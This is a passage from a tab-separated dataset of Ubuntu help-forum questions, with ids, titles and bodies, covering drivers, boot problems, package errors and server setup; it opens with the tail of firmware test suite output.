'unknown ( type 129 ) ' passed : test 1 , entry @ 0x000eee1f 'unknown ( type 130 ) ' passed : test 1 , entry @ 0x000eee35 'unknown ( type 131 ) ' passed : test 1 , entry @ 0x000eee77 'end of table ( type 127 ) ' ==================================================================================================== 23 passed , 11 failed , 0 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== check multiprocessor tables . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 9 : check mp header . passed : test 1 , mp header looks sane . test 2 of 9 : check mp cpu entries . passed : test 2 , all 2 cpu entries look sane . test 3 of 9 : check mp bus entries . passed : test 3 , all 6 bus entries looked sane . test 4 of 9 : check mp io apic entries . passed : test 4 , all 1 io apic entries look sane . test 5 of 9 : check mp io interrupt entries . passed : test 5 , all 66 io interrupt entries look sane . test 6 of 9 : check mp local interrupt entries . passed : test 6 , all 2 local interrupt entries look sane . test 7 of 9 : check mp system address entries . failed [ medium ] mpsysaddrspaceaddrlength : test 7 , system address space mapping entry 3 ( @ 0x000fd7a8 ) has a zero sized address length . failed [ medium ] mpsysaddrspaceaddrlength : test 7 , system address space mapping entry 4 ( @ 0x000fd7bc ) has a zero sized address length . test 8 of 9 : check mp bus hierarchy entries . passed : test 8 , all 1 bus hierarchy entries look sane . test 9 of 9 : check mp compatible bus address space entries . passed : test 9 , all 2 compatible bus address space entries look sane . ==================================================================================================== 8 passed , 2 failed , 0 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== acpi dsdt method semantic tests . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- fadt preferred pm profile indicates this is not a mobile platform . failed to install global event handler . test 9 of 139 : check _str ( string ) . failed [ medium ] methodreturnbadtype : test 9 , method \_sb_.pci0.lpcb.tpm_._str did not return acpi_type_string . passed : test 9 , \_sb_.pci0.lpcb.tpm_._str correctly acquired and released locks 3 times . failed [ medium ] methodreturnbadtype : test 9 , method \_sb_.pci0.itpm._str did not return acpi_type_string . passed : test 9 , \_sb_.pci0.itpm._str correctly acquired and released locks 3 times .
361815	hi i have a easynote tj71 how do i find the graphics driver for it it is a 64 bit	because i 'm having difficulties playing steam games on it using the linux version and someone told me its because i 've been given the open source one and not the dedicated one if i could get any help it 'll be great thanks
361816	what sketching software exists that has minimal memory requirements ?	i want a software that can make sketches on lubuntu and also has ability to save it . the program must work in 512 mb or less ram and thus i can not use a heavy-weight - memory intensive - solution also , i want it for my 10 year old sister who has less knowledge
361822	as for the smartphone lg e 970 c ubuntu nexus analog 4 to launch gsm	as for the smartphone lg e 970 analog 4 to launch nexus gsm bond . install a system of neksus4 it works but there is no connection as i get to work gsm bond . how to port the driver from the android on ubuntu . what do i need to do . i still nekotrye lyudibudem thank you for your help .
361823	problem when installing ubuntu 12.04.3	it says installer crashed . already try close but nothing happen , it ca n't be closed . // what should i do ? how to solve this problem ? // please ubuntu users help me .
361826	wi-fi goes out after my computer suspends	first off , in 13.10 , there is no hibernate option in the power setting . and even then , when i change the setting they do n't stay saved like they did in 13.04 . but my main problem is when i wake my computer up from going into the `` suspend '' state , the wi-fi is basically off and dead . i 've tried reconnecting manually , but it says my wi-fi is out of reach . any fixes ?
361827	software center crashes on launch	i am running an ubuntu 12.04 system . the trace i get when doing a : gksudo software-center is : 2013-10-19 15:55:21,229 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-10-19 15:55:21,864 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-10-19 15:55:22,196 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-10-19 15:55:22,583 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en , e : the package lists or status file could not be parsed or opened . 2013-10-19 15:55:25,149 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' update i removed extra software repositories ( as advised in the comment by saurav kumar ) and run : sudo apt-get update the apt-get update command executed but not without some errors at the end : ... hit http : //archive.ubuntu.com precise-security/restricted translation-en get:45 http : //archive.ubuntu.com precise-security/universe translation-en [ 52.8 kb ] fetched 18.4 mb in 1min 40s ( 182 kb/s ) reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en e : the package lists or status file could not be parsed or opened . then , when i then tried to re-launch software-center i still got what appears to be a very similar ( if not identical ) trace ( as the original one ) .
361832	how can i share my wired/wireless network with other devices on kubuntu 13.10 ?	how can i use new network manager applet to share my wired/wireless network ?
361836	how to install proprietary amd drivers on 12.04 with manually upgraded kernel ?	i 'm running ubuntu 12.04 and manually upgraded the kernel to 3.11.6 with the instructions found here : http : //linuxg.net/how-to-install-kernel-3-11-6-on-ubuntu-linux-mint-debian-pear-os-and-elementary-os/ now i want to install the proprietary drivers from the official amd website ( catalyst 13.4 ) , with the instructions here : http : //wiki.cchtml.com/index.php/ubuntu the problem is , there are different instructions ( well , i assume there are ) for each version and i do n't know which to pick , or if that choice even matters , now that i 've manually updated the kernel .
361839	missing drives during partitioning .	i had both windows7 and ubuntu 12.10 in my pc . due to some problem i was forced to format and reinstalled win7 . now when trying to install ubuntu 12.10 , i ca n't find the drives i have ! ! ! windows 7 c : \ ntfs - 100gb primary d : \ ntfs - 180gb primary e : \ ntfs - 160gb primary f : \ ntfs - 25gb primary this is i have in my pc.but during installation in my ubuntu partition manager i see /dev/sda1 ntfs 1mb /dev/sda2 ntfs 104mb /dev/sda3 ntfs 10727mb /dev/sda4 ntfs 392725mb why is this happening ? i lost my other partitions when i deleted the c drive during win7 installation . and when i created back every partitions becomes primary . no one becomes logical . please help me .
361841	can not access a directory on my webserver ( nginx : 403 forbidden )	i installed nginx and all php extensions . my web directory is /usr/share/nginx/www/ browsing to http : //localhost shows `` welcome to nginx '' browsing to http : //localhost/vnstat/ shows 403 forbidden ls -l -rw-r -- r -- 1 root root 1631 oct 19 15:08 24.png -rw-r -- r -- 1 root root 383 jul 7 2006 50x.html -rw-r -- r -- 1 root root 151 oct 4 2004 index.html drwxr-xr-x 4 root root 4096 oct 19 15:45 vnstat
361844	why ubuntu command prompt is not prompting after executing the mail command ?	uuencode text.txt | mail -s `` hai '' `` abc @ gmail.com '' < body.txt after executing this command , terminal is blank . it is not prompting for next command . i have to press ctrl+z to return to terminal . what could be the problem ?
361845	how to allow terminal executed apps to draw on phone display that runs on ubuntu touch	using apt-get i 've found serval well-known and handy applications , but unofortunately i can not execute them neither via phone terminal application or trough ssh . i found also that there is no display variable specified , and even when i set it as localhost:0 it will just print out that it can not use that screen ( or some other fatal err ) . so where is the problem ? are n't apt-get be supposed to fetch only reliable/compatible with ubuntu touch reposiories ?
361846	how to configure my power button on my cpu to hibernate my pc ? and why do hibernation take upto 5 mins to hibernate	how to configure my power button on my cpu to shutdown my pc ? when i turn that button , it sleeps . help . what to do ? also , it takes me 5 mins to hibernate . while n laptops , it takes less than 1 min
361854	ubuntu 13.10 no sound	i was running 13.04 since last monday and just today i upgraded to 13.10 , in both of these version i have not managed to get my sound working . i have gone into alsamixer and disabled auto mute and the volumes are up . however if somebody thinks they can help me fix this i will gladly follow any steps . please lay specifically any terminal commands you need me to do to either show specs or solve the problem as i am not fluent with the linux commands , this desktop being my first system to run linux , starting last monday . blake @ blake-ubuntu-pc : ~ $ lspci -v | grep -a7 -i `` audio '' 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller subsystem : asustek computer inc. device 8526 flags : bus master , fast devsel , latency 0 , irq 53 memory at fef44000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel 00:10.0 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 03 ) ( prog-if 30 [ xhci ] ) 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) subsystem : asustek computer inc. device 8445 flags : bus master , slow devsel , latency 32 , irq 16 memory at fef40000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 )
361855	ubuntu . installation went wrong ?	i just installed ubuntu and before that i was using windows 7 where i had 3 partitions - local disk c ( windows 7 ) , local disk d ( all my files ) and local disk e ( other files ) . what i did is when i was installing ubuntu was that i deleted the partition which contained windows 7 and now i ca n't see the local disk d partition so i ca n't locate files . do u think it deleted automatically or something or there is still a chance to find the files ?
361856	how to make a lan between ubuntu 13.04 and win xp sp3	i have brand new acer aspire e1 labtop with ubuntu 13.04 installed . this computer is set up to speak with my wlan . is it possible to make a lan between my old winxp sp3 to my new ubuntu acer ? the reason i want to connect them is : 1 ) in april 2014 winxp is no more supported with updates and i believe i should not go directly on the net with the xp computer after that of security reasons and i believe an ubuntu computer is safer online 2 ) i want easy access across the computers according to files . ex downloading an office document to the ubuntu pc , access the file with the winxp for editing . and shared folders between those two computers
361860	wireless networking on macbook pro early 2011 ( 8,2 )	this link tells me to connect the ethernet and then install linux=firmware-nonfree for the wireless to work . however i do not have an ethernet cable . how to download this package manually as a file from mac os x and then install it on ubuntu ?
361862	nvidia drivers - synaptic	so i am in synaptic package manager and want to install a new nvidia driver i see : nvidia-319 nvidia-319-updates which one should i pick ? which on is the non-free proprietary one ? i have a gtx580 .
361864	when i use the wacom tablet configuration in ubuntu 's settings to calibrate my tablet , where are the settings saved ?	ubuntu 's wacom tablet calibration works great , but other desktops ( xfce for example ) do not work nearly as well when using 2 monitors . i 've been searching around for a solution , but it occurred to me that if i could locate the saved calibration settings from when i ran ubuntu 's calibration app , i might be able to use them to manually calibrate my tablet in xfce . does anyone know where the settings are saved ?
361871	setup email server for email alias only	any easy way to set up a new email server to handle email alias/forwarding only for thousands of users on ubuntu 12.04 ?
361873	upgrade from lubuntu 13.04 to 13.10 failed and system doesn , t boot	i tried to upgrade lubuntu 13.04 to 13.10 using software update manager and received several errors during upgrade process . i received massage thant upgrade failed and the systen sent a bug report . after re-booting i receive a screen with these options ubundu ubuntu advaned options ... . i tried all options . nothing works . the system does not boot , fsck and mount all give nothning please help . i am afraid i have lost my file system
361874	unity is running but not displayed after upgrade to 13.10	after upgrading from 13.04 to 13.10 unity wo n't seem to work for regular users . if i were to start unity as root it works though . at the current stage , the top of the screen - that use to show the selected applications name , the date , message notifications and such - is `` hollow '' . it 's outlined by a black line and the ubuntu background is instead showing . however , if i click it , it responds as if the statusbar was there . i can minimize and close windows etc . the same thing goes for the dashboard . ! http : //image.bayimg.com/b1c9a028b20ebdc91a6ed293d05233794298d37e.jpg http : //bayimg.com/babllaafb i 've tried reinstalling unity , ubuntu-desktop , gnome-session and compiz . ccsm shows ubuntu unity plugin as running . it seems to me that this is probably some kind of permission problem .
361878	two versions of ubuntu on my computer but i want to access files from the other one on the new one	i was trying to upgrade my ubuntu 13.04 and i shut it off before it finishes and then it would n't boot . not knowing what to do , i decided to reinstall it , but since i was afraid of losing my files from the previous one , i installed 12.10 side to side . now i need my files from the previous one but that one still does n't boot . and the new one is empty . can someone please help me find a way to access my files from the previous version ? thanks in advance .
361881	how to delete an operating system ?	after i installed ubuntu , i want to remove ubuntu as it has allocated 20gb space of my hdd while my pc boots i see a choice . i want to remove that choice and use debian only
361882	some website do n't work	they are some website like yahoo mail and listwire+ ebay do n't work and they told me that it take too much time to respond for all this website , itry to change dns ( dns : google/opendns/comodosecurity ) . and in the root admin i give all acces to all kind of website but it did n't work . can you give me some solution ? ? ?
361883	i ca n't get over a resolution of 640x480 after upgrading to 12.04 , how can i fix it ?	ever since i upgraded to 12.04 my screen resolution has gone down to 640 x 480 , even though i had higher resolutions before . $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 0.0* $ lspci -nnk | grep -a5 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device [ 8086:2562 ] ( rev 01 ) subsystem : intel corporation device [ 8086:5641 ] kernel modules : i915 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 1 [ 8086:24c2 ] ( rev 01 ) subsystem : intel corporation device [ 8086:5641 ] kernel driver in use : uhci_hcd how can i get higher resolutions ? i know that my monitor supports higher resolutions .
361884	monitor resolution ca n't be saved	today i installed lubuntu 13.10 on vmware player ( inside windows ) . i change the monitor setting ( resolution ) from default 800x600 to 1680x1050 . it works . beside apply , i also press save button . `` changes are saved '' appears . but - after restart , the resolution is again in 800x600 . i also opened /etc/xdg/lxsession/lubuntu/autostart and add ( it was empty before ) one line : @ xrandr -- mode 1680x1050 after restart the default resolution is back again . any idea ?
361885	appearance , online accounts disappeared in system settings in ubuntu 13.10	i was installing some apps and icons then i noticed that there were about 4 games installed , so i went to the software centre to remove them . then i wanted to add my facebook account to online accounts but alas ! it was disappeared . but it was there when i searched for online accounts in the unity dash . please help me . i think i might have uninstalled the wrong packages . can anyone tell me the packages that are associated with them ? below are screenshots of my settings window and the online accounts icon in the unity dash .
361886	can not find root device after latest kernel upgrade	i 'm running ubuntu 13.04 . yesterday i tried to install updates but there was an error , and it suggested running apt-get -f install which i did . now when i try to boot , i get an error `` gave up waiting for root device '' . the text is almost identical to the text shown in this and this question . however , the `` built-in shell '' simply does n't work ! nothing i type shows up on the screen or does anything . loading the previous kernel works ( although there are a few graphics glitches ) but as far as i can tell , it should be booting the exact same stuff . the new kernel is 3.8.0-31-generic and the previous working one is 3.8.0-25-generic . i tried adding a rootdelay to grub as suggested but it just waits longer and shows the same screen . here is my entire /boot/grub/menu.lst file , comments removed : default 0 timeout 3 title ubuntu 13.04 , kernel 3.8.0-31-generic uuid c690c1e6-beb9-46e7-85c2-145cd07d44ac kernel /boot/vmlinuz-3.8.0-31-generic root=uuid=c690c1e6-beb9-46e7-85c2-145cd07d44ac ro quiet splash initrd /boot/initrd.img-3.8.0-31-generic quiet title ubuntu 13.04 , kernel 3.8.0-31-generic ( recovery mode ) uuid c690c1e6-beb9-46e7-85c2-145cd07d44ac kernel /boot/vmlinuz-3.8.0-31-generic root=uuid=c690c1e6-beb9-46e7-85c2-145cd07d44ac ro single initrd /boot/initrd.img-3.8.0-31-generic title ubuntu 13.04 , kernel 3.8.0-25-generic uuid c690c1e6-beb9-46e7-85c2-145cd07d44ac kernel /boot/vmlinuz-3.8.0-25-generic root=uuid=c690c1e6-beb9-46e7-85c2-145cd07d44ac ro quiet splash initrd /boot/initrd.img-3.8.0-25-generic quiet title ubuntu 13.04 , kernel 3.8.0-25-generic ( recovery mode ) uuid c690c1e6-beb9-46e7-85c2-145cd07d44ac kernel /boot/vmlinuz-3.8.0-25-generic root=uuid=c690c1e6-beb9-46e7-85c2-145cd07d44ac ro single initrd /boot/initrd.img-3.8.0-25-generic title ubuntu 13.04 , kernel 3.8.0-23-generic uuid c690c1e6-beb9-46e7-85c2-145cd07d44ac kernel /boot/vmlinuz-3.8.0-23-generic root=uuid=c690c1e6-beb9-46e7-85c2-145cd07d44ac ro quiet splash initrd /boot/initrd.img-3.8.0-23-generic quiet title ubuntu 13.04 , kernel 3.8.0-23-generic ( recovery mode ) uuid c690c1e6-beb9-46e7-85c2-145cd07d44ac kernel /boot/vmlinuz-3.8.0-23-generic root=uuid=c690c1e6-beb9-46e7-85c2-145cd07d44ac ro single initrd /boot/initrd.img-3.8.0-23-generic title ubuntu 13.04 , memtest86+ uuid c690c1e6-beb9-46e7-85c2-145cd07d44ac kernel /boot/memtest86+.bin quiet title -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- root title windows vista rootnoverify ( hd0,2 ) savedefault makeactive chainloader +1 with the rootdelay the line in the top section was : kernel /boot/vmlinuz-3.8.0-31-generic root=uuid=c690c1e6-beb9-46e7-85c2-145cd07d44ac rootdelay=120 ro quiet splash as you can see the uuid is the same for all kernels . why am i getting this problem , and what can i do to fix it ? the output of dpkg -l linux-image-* was pretty long so i put it here : http : //pastebin.com/mljqecbv
361887	how can i install ubuntu saucy server with btrfs ?	so , a week ago i installed the latest beta version of ubuntu saucy server in a macmini using btrfs as only partition to mount / on it ( i know it 's not recommended to do this , but it 's not the point here ) with no problems at all . everything went just `` naturally '' ... now with the released image of 13.10 server , i just ca n't get any btrfs partition done from installer . i 'm getting a : ca n't create filesystem error , whenever i try to create any btrfs partition , like the 13.10 server final installer ca n't handle format btrfs partitions ... am i doing something wrong ? or it 's a bug in the installer ? is there anything that i can do to workaround this and get my btrfs partition set on installation , or i 'll need to work this after the installation . i can just leave some space left and create a btrfs partition later on , with saucy already installed and proceed to use to lxc ( which is my solo purpose to have btrfs ) , but anyway , why installer ca n't do btrfs anymore ?
361888	screen going blank	when i am watching videos via vlc or watching videos in firefox - even when i simply click dash home - screen goes blank - nothing working - i needed to restart to recover . not sure which is causing this issue . is it because of graphics card problem - not installed any proprietary drivers . os : ubuntu 12.04 graphics card : 1 gb - [ amd/ati ] rv710 [ radeon hd 4350/4550 ] could you help me on this . xorg.0.log data : http : //pastebin.com/rnvcpc3z regards , deena
361889	am i allowed to display the ubuntu logo ?	morning , as i get closer to setting up my services etc for my website am i allowed to display the ubuntu logo ? there are some that do n't allow it .
361891	hello , issue with this command apt-get	e : could not open lock file /var/lib/apt/lists/lock - open ( 2 : no such file or directory ) e : unable to lock the list directory
361894	boot existing ubuntu installation on uefi , gpt btrfs	i have looked through many of the questions , and have n't found anything that quite satisfies this problem . i have an ssd hard drive that is bootable from my old computer . it is a standard bios , however , i built a new computer with z87 motherboard that is a uefi . what i 'd like to do is boot from this hard drive without wiping out the hard drive . i 've tried booting from legacy mode , does n't seem to work . part of the multitude of problems is my partitioning scheme , which is gpt . sdx1 is the btrfs system , sdx2 swap , sdx3 is bios_grub . i 've tried setting the uefi/bios to boot in legacy mode , i 've tried turning my swap partition into a grub efi boot , i 've tried copying the file system onto a new drive installed on the new system . however , copying the information does n't keep the filesystem or subvolumes intact . i 've also tried boot-repair which is when i overwrote the swap space . i 'd really rather not start over on a new install , so any other suggested trees to bark up would be appreciated . for the record , i hate you microsoft , and asus i understand complying with microsoft , but make it optional ... i 'm really disappointed in that i have to deal with windows 8 when i have nothing to do with it . something i think i could try , but would like to hear from more experienced users . moving the sdx1 ( btrfs / @ / @ home ) partion and opening up a 100 mb partition on the beginning sectors and install efi compatible grub2 installation . would it work ? how to move a partition ?
361895	package broken , and no installation accepted by terminal	i installed cinnamon and then was trying to install other apps but as you can see on the picture , package brocken , any ideas how could this error be solved ? thanks
361896	grub-customizer made windows 7 disappear from gurb2	i am running dual-boot ubuntu 12.04/windows7 . i wanted to change the boot order in grub2 to have windows on top of the list . i installed grub-customizer on ubuntu 12.04 using the following terminal commands copied from another post : sudo add-apt-repository ppa : adabbas/1stppa sudo apt-get update sudo apt-get install grub-customizer after installing , i launched grub-customizer from dash home . windows 7 does not appear in the list . i closed the program and was prompted to save the current settings . upon rebooting , windows did not appear in the grub2 list . i went back into grub-customizer and clicked the `` revert '' button but still no windows 7 . does anyone know how i can fix this ?
361898	running evolution mail reader logs off ubuntu	today i observed a very strange behavior on ubuntu 12.04 . when i run the mail reader evolution it makes ubuntu to log off and then the start-up log-in screen appears . i tried to re-install it as , $ sudo dpkg -r evolution $ sudo apt-get install evolution evolution-indicator but the same thing keeps happening to me . here are some lines in the system log that might help one to recognize the problem : oct 19 18:16:21 dell aptdaemon : info : commitpackages ( ) was called : dbus.array ( [ dbus.string ( u'evolution ' ) , dbus.string ( u'evolution-dbg ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) oct 19 18:16:21 dell aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/542660630ed8492d9e2758c64f570e6d oct 19 18:16:25 dell aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/542660630ed8492d9e2758c64f570e6d oct 19 18:16:25 dell aptdaemon.worker : info : committing packages : dbus.array ( [ dbus.string ( u'evolution ' ) , dbus.string ( u'evolution-dbg ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ ] , signature=dbus.signature ( 's ' ) ) oct 19 18:16:26 dell aptdaemon.worker : info : processing transaction /org/debian/apt/transaction/542660630ed8492d9e2758c64f570e6d oct 19 18:17:01 dell cron [ 26341 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) oct 19 18:17:11 dell aptdaemon.worker : info : finished transaction /org/debian/apt/transaction/542660630ed8492d9e2758c64f570e6d oct 19 18:17:19 dell gnome-session [ 9146 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 oct 19 18:17:19 dell acpid : client 8960 [ 0:0 ] has disconnected oct 19 18:17:19 dell acpid : client 8960 [ 0:0 ] has disconnected oct 19 18:17:19 dell acpid : client connected from 26439 [ 0:0 ] oct 19 18:17:19 dell acpid : 1 client rule loaded oct 19 18:17:20 dell acpid : client connected from 26439 [ 0:0 ] oct 19 18:17:20 dell acpid : 1 client rule loaded
361900	force apt-get to ask all install questions again ?	while installing jackd using apt-get , i gave the wrong answer to some questions . how do i force apt-get to ask me the question again ? i 'd really rather do this through the package manager than making the changes manually . i tried to purge it and install it again . i have also tried dpkg-reconfigure jackd .
361901	boot prompt hyphens	booting an ubuntu dvd , pressing f6 and then esc presents the boot prompt with the default kernel options , with the possibility of editing and adding extra options . something like : kernel /casper/vmlinuz boot=casper quiet splash -- questions : what 's the meaning of the two hyphens ? when adding an extra option ( such as toram or vga=791 ) , is there any difference between adding it before or after the hyphens ? when typing commands in bash , two hyphens in a row means `` options end here ; anything that follows should be treated as an argument , even if it starts with a hyphen '' . but the hyphens must have another meaning at the boot prompt , as toram or vga=791 really are options .
361902	how to install nginx after removed it manually	i have installed nginx using apt sudo apt-get install software-properties-common sudo add-apt-repository ppa : nginx/stable sudo apt-get install software-properties-common sudo apt-get update sudo apt-get install nginx then i used whereis nginx and removed all files manually using rm now i wan na re-install nginx but it does n't work and returning error : awk : can not open /etc/nginx/nginx.conf ( no such file or directory ) i create /etc/nginx/nginx.conf then use apt-get install nginx it installed completely does n't work . output of sudo dpkg -l | grep nginx : ii nginx 1.4.3-1~raring0 all small , powerful , scalable web/proxy server ii nginx-common 1.4.3-1~raring0 all small , powerful , scalable web/proxy server - common files ii nginx-full 1.4.3-1~raring0 i386 nginx web/proxy server ( standard version )
361904	how to remove all device icons from unity launcher in 13.10 ?	how to remove all drives icons from unity launcher in 13.10 ? old trick with dconf-editor does not work anymore . i can remove any entry from com.canonical.unity.launcher.favorites , but not unity : //devices or unity : //running-apps . if i do delete them then these entries are automatically added back to the favorites .
361907	install driver form command line	i recently did some stuff on my computer ( installing various things ) and now my computer does not have a gui . i can log into my computer via command line and work only from the command line . i need drivers for my computer . i am not sure how to install them . i tried this : sudo apt-add-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings but that throws many errors . how can i install the latest stable proprietary driver ? this has to be done form the command line .
361910	to use ppa on 12.04 lts cloud image	in a earlier post i had asked the question of why juju and maas was n't working and outlined all of the steps . when using the 12.04 lts cloud image should i still need to add the ppa for juju and maas ? i understand it is important to have the latest with the install . however , my concern is will this break something that would work without ppa now that 13.10 is out ?
361912	can i use ubuntu on samsung galaxy grand quattro ?	i have samsung galaxy grand quattro . the phone hardware configuration as below : processor : quad core ram : 1gb internal memory : 8gb , 4gb usable android 4.0.4 os so , is it compatible with ubuntu ? can i make calls & use 2g/3g internet after installing it ? kindly reply asap , so i can think of installing ubuntu on my phone . thanks ,
361913	migrating apps and settings to a fresh install	so this was never fixed and now my only choice is to start from scratch with a new install , but having the previous one for so long i had a number of apps and configurations that i want in my new install . any easy ways to do it ?
361918	can i use asp.net as front end and mssql as back end ?	i have an specific requirement of my client . he wants me to develop an web based application for him which will be hosted on ubuntu . i am having experience with asp.net and mssql . can i use this ? if yes , anyone please help me , how can i do this ?
361921	ubuntu 12.04 , thinkpad t410s no autoswitch for dock microphone input	how do i turn on the dock 's microphone input ? it does not autoswitch from the internal mic . to an external .
361923	openvz ubuntu 13.04 vps - unable to install mysql	today i bought a vps from edis.at , ovz starter , and i installed ubuntu 13.04 x64 on it . on a fresh install , running apt-get install mysql-server , freezes apt-get . after setting the mysql root password , i get this error : unable to set password for the mysql `` root '' user ... , and apt-get freezes . i ca n't even ctrl-c out of it . i 've reinstalled multiple times , but the same issue always happens . what can i do ? full shell log : from fresh install to freeze
361925	how to delete an item from the update manager	i need to delete an update from the update-manager . until now i could not find the way to do it . anybody may help ?
361926	how do i connect laptop to tv ?	when i connect my laptop to tv via hdmi it shows me this : but it shows me it the screens one on the another and sometimes i donât see windows , what should i do ?
361928	installing and maintaining email server	until now , i 've been using managed shared hosting , but recently i 've been seriously considering moving everything to a vps , such as linode . the one thing that has me really hesitating is that i must have a externally accessible email service as well . i 've done a bit of research and i have no problem installing postfix/dovecot/exim ( plus clamav and spamassassin ) . but it worries me that it may be a lot more difficult to install and maintain than i expected . the only thing that seems to make this difficult is that i have four or five domains , each with their own email addresses that i want to carry over to the new setup , and i want all client traffic to be encrypted . so how difficult is it to get an email server up and running , that 's accessible via external email clients ( smtp and pop3 -- no imap ) , works with ssl/tls , and supports multiple domains ?
